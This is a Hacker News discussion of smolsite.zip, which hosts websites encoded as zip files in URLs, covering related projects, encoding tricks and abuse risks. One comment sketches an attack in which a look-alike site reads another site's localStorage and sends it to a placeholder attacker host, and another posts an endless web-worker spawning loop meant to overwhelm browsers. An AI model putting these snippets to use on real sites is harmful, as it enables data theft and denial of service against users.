(Un)fortunately, web browsers [1] and URL shorteners block opening and redirecting to data URLs, so they are mostly useful as bookmarks in the browser.
That still sends the content to the server for unpacking. A slightly more convoluted option would be to put the zip in the anchor (fragment) part instead and have the response serve code to unpack it client side. Though then the server can't scan for damaging content being sent via it, even if it wanted to, since the fragment never gets sent to the server.
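A minimal sketch of that client-side variant, assuming the fragment carries a base64-encoded zip and a zip library such as fflate is available (the CDN path and base64 flavor are assumptions, not what smolsite.zip actually does):

```
<script type="module">
  // Sketch only: unpack a zip carried in the URL fragment entirely client side.
  // fflate is one possible zip library; the CDN path below is illustrative.
  import { unzipSync, strFromU8 } from 'https://cdn.jsdelivr.net/npm/fflate@0.8.2/esm/browser.js';

  const b64 = location.hash.slice(1);                        // fragment is never sent to the server
  const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
  const files = unzipSync(bytes);                            // { "index.html": Uint8Array, ... }
  document.documentElement.innerHTML = strFromU8(files['index.html']);
</script>
```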
I thought the same thing (though you could do it without anchors as long as the static content server used a glob for routing all traffic to the same web page). It would really simplify hosting.
I love this type of stuff too, but be aware ycombinator is a startup incubator - people showing off their wares is presumably encouraged, up to a point.
I don't think it qualifies as advertising. People come to Hacker News to see what hackers are working on. It's certainly a major reason why I come here.
Every Show HN post I've seen was interesting. Motivated me to start my own projects and polish them so I can show them here. It's a really good feeling when someone else submits your work and you get to talk about it.
I had an idea once to implement Borges's Library of Babel just like this: all the text is in the URL. With more sophisticated encoding, you can optimize English words. Then hook it up to a "search system" so you can search for your own name, clips of text, etc.
Eventually you'd hit the URL size limit, of course, but maybe we add a layer on top for curators to bundle sets of URLs together to produce larger texts. Maybe add some LLM magic to generate the bundles.
You'd end up with a library that has, not just every book ever written, but every book that could ever be written.
[Just kidding, of course: I know this is like saying that Notepad already has every book in existence--you just have to type them in.]
The comment in the first link about Yahoo embedding a giant b64-encoded JSON object in the URL reminds me of something horrible I did in a previous job.
To get around paying our website vendor (think locked-down hosted CMS) for an overpriced event calendar module, I coded a public page that would build a calendar using a base64-encoded basic JSON "events" schema embedded in a "data-events" attribute. Staff would use a non-public page that would pull the existing events data from the public page to prepopulate the calendar builder, which they could then use to edit the calendar and spit out a new code snippet to put on the public page. And so on.
It basically worked! But I think they eventually did just fork over the money for the calendar add-on.
Mostly just the DIV with a giant string of base64-encoded JSON in a data attribute that looked pretty ugly. Website visitors were of course basically none the wiser if it all worked.
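For the curious, a rough reconstruction of the trick (the attribute name is from the comment above; the markup and event schema here are made up for illustration):

```
<!-- Illustrative only: base64-encoded JSON events in a data attribute -->
<div id="calendar" data-events="W3sidGl0bGUiOiJPcGVuIEhvdXNlIiwiZGF0ZSI6IjIwMjQtMDUtMDEifV0="></div>
<script>
  const el = document.getElementById('calendar');
  const events = JSON.parse(atob(el.dataset.events));   // [{"title":"Open House","date":"2024-05-01"}]
  for (const ev of events) {
    const row = document.createElement('div');
    row.textContent = `${ev.date}: ${ev.title}`;
    el.appendChild(row);
  }
</script>
```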
I immediately thought this is a great way to ship malicious payloads to an unexpected party. A good WAF would block it as sus, but a few tricks could probably get around that as well
In this exact context it's likely not a problem, but essentially this is a ready-to-go XSS attack. As far as I can tell there are no CORS or domain-level protections, so an "attacker" here could easily do anything else with any client-side data being used by any other "site" on the domain.
Let's say I make a little chat app that stores some history or some other data in local browser storage or cookies. Any other site can just as easily access all of that information. An "attacker" could link you to a modified version of the chat site that relays all of your messages to their server while still making it otherwise look like it's just the normal chat. It would also retain any client side information you had previously entered like your nick name or chat history, since it's stored in local storage.
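To make that concrete, a hypothetical sketch (the host names and storage keys are invented): localStorage is keyed by origin, not by path, so two "sites" served from the same host see each other's data.

```
// On the legit chat "site", e.g. https://example.zip/<zip-for-chat-app>:
localStorage.setItem('chat-history', JSON.stringify(['hi', 'meet at 7']));

// On a look-alike "site" served from the same origin,
// e.g. https://example.zip/<zip-for-attacker-page>:
const stolen = localStorage.getItem('chat-history');          // readable: same origin
new Image().src = 'https://attacker.example/collect?d=' + encodeURIComponent(stolen);
```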
Most of the time, sanitizing input (like ensuring users don't have HTML in their names or comments), combined with domain-level separation and CORS policies, ensures that one site can't do things that "leak" into another. It's the reason that, most of the time, no matter how badly people mess things up, Facebook getting hacked in your browser doesn't compromise your Google account.
Intrepid web developers reading this comment, please note that CORS is not, in fact, a protection mechanism. It's a way to relax the Same Origin Policy which is actually the protection relevant here. You don't need a CORS policy to protect a site from cross-site attacks, you need no CORS policy. Go ahead and make your little chat app, you're not at risk of having your messages stolen because of a lack of CORS headers.
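In other words (placeholder domains, just to illustrate the default): without any CORS headers on the response, a cross-origin read simply fails, and adding Access-Control-Allow-Origin would loosen that, not tighten it.

```
// Running on https://evil.example, trying to read another origin's data:
fetch('https://chat.example/messages', { credentials: 'include' })
  .then(res => res.json())
  .then(data => console.log('never reached without CORS headers on the response', data))
  .catch(err => console.log('blocked by the Same-Origin Policy:', err));
```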
I did say it wrong, but my point was that the site doesn't segment each "site" off into a different subdomain, or apply any other scheme that would let the same-origin policy restrict access.
As it is with this site, the messages can get "stolen" by any other site on the same domain - which could be anything, since anyone can upload a zip and direct a victim to it.
The difference is that if GitHub is found distributing malware on GitHub pages, you can notify them, they verify it, take it down, and open a process to eventually ban the offender.
They expend enough effort on this to ensure the vast majority of content on GitHub Pages is not malware, and to avoid getting blanket-flagged as such.
It's not clear if smolsite.zip can successfully set up a similar process, given that they'll serve just any zip that's in the URL, and they won't have the manpower to verify takedown requests.
Cool little project! I did a similar thing recently, I wrote a pastebin that puts the file contents in the URL with brotli. [0]
It works quite well, but I'll need to update the syntax highlighting soon as at least Gleam is out of date (boy that language moves fast), and sometimes brotli-wasm throws a memory allocation error for some reason. I guess that's one cool thing that WASM brought to the table, memory handling issues.
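If anyone wants to try the same idea, a rough sketch of the round trip, assuming brotli-wasm's documented compress/decompress API (error handling and chunking for large inputs omitted):

```
import brotliPromise from 'brotli-wasm';   // async import: the wasm has to load first

async function encodeToFragment(text) {
  const brotli = await brotliPromise;
  const compressed = brotli.compress(new TextEncoder().encode(text));
  // base64url so the payload survives in a URL fragment
  return btoa(String.fromCharCode(...compressed))
    .replaceAll('+', '-').replaceAll('/', '_').replaceAll('=', '');
}

async function decodeFromFragment(fragment) {
  const brotli = await brotliPromise;
  const b64 = fragment.replaceAll('-', '+').replaceAll('_', '/');
  const bytes = Uint8Array.from(atob(b64), c => c.charCodeAt(0));
  return new TextDecoder().decode(brotli.decompress(bytes));
}
```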
you could save yourself from serving all the websites (and server costs) with just one character!
pass the base64 in the hash field by simply prepending # to it. also it seems the URL length limits do not include the hash, so maybe notsosmolsite.zip? ;)
https://news.ycombinator.com/item?id=37410630 is fun but it's too much of a follow-up* to the current thread. If you get in touch with us at hn@ycombinator.com after some time (say a month or two, to flush the hivemind caches), we'll send you a repost invite.
Ok, cool. I'm not sure I understand the issue though: this thread reminded me of that page, so I thought other people might be interested in it too; there wasn't much conversation here, and it felt like it was somewhat offtopic on this page anyway.
You didn't do anything wrong! It's just that if you consider two principles: (1) frontpage space is by far the scarcest resource HN has; and (2) repetition isn't good for curiosity, it follows that we need to try to keep a fair amount of time and space between similar-ish topics.
It's also in the interest of the follow-up post because then community interest in that-type-of-thing can focus on it specifically instead of getting split between semantically-overlapping threads.
It doesn't seem like the client actually verifies that the content it got back matches the SHA-256 it requested, so in theory if you really wanted to meet them you could start serving an updated website with details on how to get in contact with you. Though that'd ruin the magic of it, I'd bet :)
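The missing check is small; a sketch with the Web Crypto API (the helper name is mine):

```
// Hash what actually came back and compare it to the digest that was requested.
async function matchesRequestedDigest(bytes, expectedHexSha256) {
  const digest = await crypto.subtle.digest('SHA-256', bytes);
  const hex = [...new Uint8Array(digest)]
    .map(b => b.toString(16).padStart(2, '0'))
    .join('');
  return hex === expectedHexSha256.toLowerCase();
}
```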
I did something like this last year (maybe two years ago by now? time flies), but with LZString instead of gzip[0]. The original idea was actually someone else's on Mastodon (who knows, maybe it was OP? I think it was Ramsey Nassr though), but it was just B64 at first - I added the compression.
Then someone tried fitting King Lear in there (which worked).
Then it turned out that, until that day (but not for very long after), URLs were not counted toward the character limit in Mastodon toots.
That froze quite a few Mastodon clients that were unlucky enough to open that toot, for a day or two until it got fixed. Not sure why; I'm guessing (accidentally) quadratic algorithms that weren't counting on URLs multiple kilobytes in length.
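For reference, the lz-string part looks roughly like this (the page URL is a placeholder; the original site's markup may differ):

```
import LZString from 'lz-string';

// Writing: compress the text into a URL-safe string and hang it off the fragment.
const payload = LZString.compressToEncodedURIComponent('<h1>King Lear</h1> ...');
const shareUrl = `https://example.invalid/#${payload}`;

// Reading: on page load, decompress whatever is in the fragment.
const text = LZString.decompressFromEncodedURIComponent(location.hash.slice(1));
```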
I like embedding external resources such as bitmap images in SVG in CSS in HTML so that a document is truly portable and can be sent by email or messenger services. So I don't need a URL. The whole document has to be shared, not just a link to it.
I also found the favicon can be encoded in this way.
I don't do scripts, but a lot of fun can be had with HTML when you start doing unusual things with it. For CSS I also use my own units, just for fun. So no pixels, ems or points, but something else... CSS variables make this possible. I like to use full semantic elements and have minimal classes, styling the elements. This should confuse the front end developer more used to the 'painting by numbers' approach of typical website frontend work.
I just work from the HTML specs and go my own way. There is something I am working on that 'needs' this stuff. I see HTML as a creative medium and I wanted to solve problems such as internal document navigation - rather than hundreds of web pages, compile the lot into one.
The PWA takes an entirely different approach to what I am trying to do. I like the PWA approach but I want one file that can be moved or emailed, to be available offline.
I found that making all the images inline worked for me. I got best results with webp rather than avif but don't care about losing the size benefits with base64 encoding - once zipped those compress nicely.
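A stripped-down sketch of such a single-file document (the base64 payloads are truncated placeholders, and the "custom unit" is just a CSS variable as described above):

```
<!doctype html>
<html>
<head>
  <!-- favicon inlined as a data URL -->
  <link rel="icon" href="data:image/png;base64,iVBORw0KGgo...">
  <style>
    :root { --step: 1.25rem; }                 /* home-made unit via a CSS variable */
    figure { margin: calc(2 * var(--step)); }
  </style>
</head>
<body>
  <figure>
    <!-- bitmap inside SVG inside HTML, so the one file carries everything -->
    <svg viewBox="0 0 100 100" width="200" xmlns="http://www.w3.org/2000/svg">
      <image href="data:image/webp;base64,UklGR..." width="100" height="100"/>
    </svg>
    <figcaption>Everything above travels in this one file.</figcaption>
  </figure>
</body>
</html>
```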
I like how it requires sending all the data up to the server, where I guess it gets discarded, and then returns a static HTML page that converts that same data into a web page on the client.
Has the advantages of being centralized (the site can be shut down, nuking all URLs) and decentralized (requires tech skills to set up, the site cannot be updated without changing the URL, etc.). Adding tinyurl to this as suggested in another comment takes it to the next level!
I wonder what happens with liability for the content on these URL-websites. Is the liability now on the one who shares the URL, or on whoever serves it?
Also having fun with this subject at https://goog.space/ - trying to add WebRTC and yjs, plus archive.is for storing a link (and minification). Fun to see so many people trying things out with URLs, client-side web apps, and encoding/decoding data.
Some Google image search results use base64 data URLs for their thumbnails. Does anyone have any idea why?
Search "Pepsi can" and for some results, right click > copy image address gives you "data:image/jpeg;base64,/.../" instead of the website's image URL. Presumably to limit server cost / make the browser render? It's not all sites, so perhaps for more common sites (Walmart for example) it gives the correct image URL.
Specifically for a gallery page of search results, I'd guess that it's to provide a more-consistent experience.
When you load that results page, you'd be reaching out to ~100+ different domains that will respond and render the images at different rates (and some will fail to load at all). Base64-encoding lets you shove binary content into caches like Redis, retrieval and embedding of which would be preferable to hotlinking to a slow site. Then most of the page gets rendered at the same time client-side.
I still have control over the domain I bought a few years ago to implement something similar.
What ultimately stopped me is that on a site of this type you can't really include links to other sites made the same way, because your URL length is going to balloon.
Coolest application of data URLs ever. It's amazing how simple this idea is, yet I have NEVER considered trying it out. I'm not surprised this idea has been done before, but somehow it still never crossed my mind.
I can't do it right now, but think of this: we could then create a site that, upon some input, creates a zip file and links to itself, in a possibly infinite loop of self-generating websites!
The bad news is it required Firefox Nightly, and honestly I'd be surprised if it even still works, because Mozilla laid off the people who were working on libdweb.
"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not."
Wouldn't infinitely spawning web workers do the same thing as a zip bomb?
```
<script>
// Worker source as a template literal, so it can span lines inside the Blob
const workerBlob = new Blob([`
  while (true) { console.log("this is a worker that will never stop") }
`], { type: 'application/javascript' })
const workerBlobURL = URL.createObjectURL(workerBlob)
// Keep spawning workers until the browser gives up
while (true) { new Worker(workerBlobURL) }
</script>
```
cool. alas, i've got all .zip domains blocked because the vast majority of them are used by malware people trying to trick someone into "downloading a zip file"
Thinking of reasons not to do this, though: it's effectively impossible to moderate the content, at least without building a database of all the content you don't want to host.
That's even worse. The issue is not that you have the bytes, it's that users see the content on your site. The less control you have the more difficult it would be to meet legal obligations surrounding user generated content.
The deal made years ago in law in the US (and followed around the world) is that websites are not liable for the user generated content that they make available, as long as they remove it if requested for legitimate reasons. These two components go hand in hand. If a website is unable to remove content, it's effectively liable for that content. This basically breaks the web as we know it today.
Base122 or whatever the other option is (and I'm sure there are others), which tries to take advantage of the whole UTF-8 space and probably wouldn't even work in URLs, is only something like 15% denser. Obviously, you're limited to printable characters here.
Your citation says Chrome supports 32779 and Safari >64k. I think it’s fair to say that, as a user (disregarding potential search engine aspects), 8000-character URLs are 100% fine these days.
Yeah, I had exactly that, but in my opinion better, with fullscreen mode on https://flems.io. Right up until hackers found it was a great place to host their phishing sites...
I created a website years ago that let anyone come and just "post" something online anonymously - quick notes or whatever - but I have since had to add a registration process and record IP addresses, as the website was overrun by what looked like Russian hackers and the dark web in general looking for a place to, uh... post links to child... well, anyways, it took me almost a month to track down all my own website links, as everything was encrypted and growing faster than I could delete it. Def sucks to know that even though I took down their means to 'conduct business', they will continue to find other websites.
Auth is handled in the playground.
We offer "Sign in with GitHub, Google, Microsoft, Facebook, and Apple". Anyone can see the code with /? but only the owner(s) can (re-)deploy it.
---
There is also service worker support which deploys as a Cloudflare Worker!
Yeah, server-side is much easier to code. But it should be doable with JS
I've already built a website that reads zip files client-side with JS here: https://madacol.github.io/ozempic-dicom-viewer/ . It will read the zip file and search for MRI/CT scan images to display.
Where I have doubts is how to reference external files from the main `index.html` file. I know you can load files as blobs and get a URL (I did that in my website above), but I am not sure if that will work as references in the <head>
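One possible approach (a sketch, assuming fflate for the unzip step): turn every entry into a blob: URL and rewrite the references in index.html before injecting it. The naive string replace below would need to become proper URL resolution, and a real version would set each Blob's MIME type per file extension.

```
import { unzipSync } from 'https://cdn.jsdelivr.net/npm/fflate@0.8.2/esm/browser.js';

function renderZip(zipBytes) {
  const files = unzipSync(zipBytes);                    // { "index.html": Uint8Array, "style.css": ... }
  const blobUrls = {};
  for (const [name, data] of Object.entries(files)) {
    blobUrls[name] = URL.createObjectURL(new Blob([data]));   // MIME type omitted in this sketch
  }
  let html = new TextDecoder().decode(files['index.html']);
  for (const [name, url] of Object.entries(blobUrls)) {
    html = html.replaceAll(name, url);                  // naive rewrite of relative references
  }
  document.open();
  document.write(html);
  document.close();
}
```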
Data is already stored in the ZIP file deflated, so I can just send whatever is inside the ZIP file back to the client if they accept that encoding (which is pretty much always the case, given how ubiquitous deflate is).
The server parses the ZIP file and stores that information in a hash table for quicker lookup but it's otherwise not decompressing anything. This hash table is kept for a few minutes to avoid having to decode the base64-encoded data and parse the ZIP file for every request.
So decompression is happening on the client, but not at the JS level; instead you're taking advantage of the browser's ability to accept compressed content from the server, hence decompression is done by the browser's own behavior when it receives a "content-encoding: gzip" stream or something like that.
The iframe's sandbox attribute is doing a lot of work. I tried to change the parent window location to remove the footer, but the sandbox thwarted me since it didn't include "allow-same-origin".
It's collected after 15min, give or take. The hash isn't random, it's the SHA-1 hash of the base64-encoded data, so it's predictable -- if something keeps accessing the base-64 encoded URL, the /s/... URL won't vanish.
I tried making it more strict (by checking the Sec-Fetch-Site and Sec-Fetch-Dest headers), but not all browsers send that.
https://smolsite.zip/UEsDBBQAAgAIAFtLJ1daaE7RlwIAAN4EAAAKAAA...